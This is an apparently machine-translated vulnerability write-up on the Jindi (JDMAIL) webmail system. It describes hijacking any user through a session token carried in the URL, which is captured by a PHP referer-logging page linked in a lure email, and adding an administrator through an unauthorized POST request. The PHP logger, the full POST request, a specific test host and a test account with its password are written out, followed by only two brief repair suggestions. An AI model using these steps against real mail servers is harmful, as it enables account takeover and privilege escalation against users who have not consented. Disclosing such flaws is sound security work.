Any user in the jindi email system is hijacked to add a system administrator.
JDMAIL
This email system has multiple high-risk vulnerabilities with design defects.
0x001 arbitrary user hijacking
This email system has an 8-or 9-bit string in the url after login, such as 45e22a8H7
This string is the logon credential. After logon, you can directly log on to this user name without session and cookie verification.
This means that we can directly use this url to log on to the system as long as the user name is not logged out.
The method of exploitation is very simple. You can send an email to any user and add a hyperlink to the email content to trick the user into clicking this link. This link captures the Referer of the request on the backend, now you can get his url and hijack the user.
The administrator can directly send a malicious email to hijack the account.
Alternatively, you can use XSS to hijack any user account.
Here we take http://mail.lyx928.com: 8080 for testing.
User test@dodole.net, weak password 111111
After logging in, we will send an email to this user:
A hyperlink is added to the content:
The content of this hyperlink is:
<?phpfile_put_contents("referer.txt", " ref:".$_SERVER["HTTP_REFERER"], FILE_APPEND); file_put_contents("referer.txt", " IP:".$_SERVER["REMOTE_ADDR"], FILE_APPEND); file_put_contents("referer.txt", " Time:".date("Y.m.d H:i:s")."\r\n",FILE_APPEND); ?>
The retrieved referercontent is included in referer.txt.
When the test@dodole.net clicks this link, look at the Referer content we get:
The Referer and the authentication string in the url are obtained successfully.
We can change the browser to access this url to see if the login is successful:
The user who successfully logs in to the hijacking is very Easy!
0x002 add an administrator
There is an unauthorized operation. After logging on to a common user, you can directly add an administrator user:
Link: http://mail.lyx928.com: 8080/tmw/45e22a8H7/mailmain? Type = msaveuserPOST: subtype = new & username = test123 & domain = dodole.net & usertype = S & departmentid = & first_name = test123 & password = 111111 & encodetype = inner & enable = true & enable_smtp = true & enable_pop3 = true & enable_imap4 = true & enable_webaccess = true & alias = & expiredtime = & max_mailbox_size =-1 & Records =-1 & fm_size =-1 & fm_upload_size =-2 & sendmail_freq = & amp & sendsms_freq = & sendmms_freq = & response = & default_language = SIMPLIFIED_CHINESE & telephone = & mobile = & postalcode = & country = & state_province = & city = & organization = & department = & address =
Add an administrator user for a test123@dodole.net
Vulnerability repair suggestions:
1. Enhance User Login status verification
2. Strict Control of User Permissions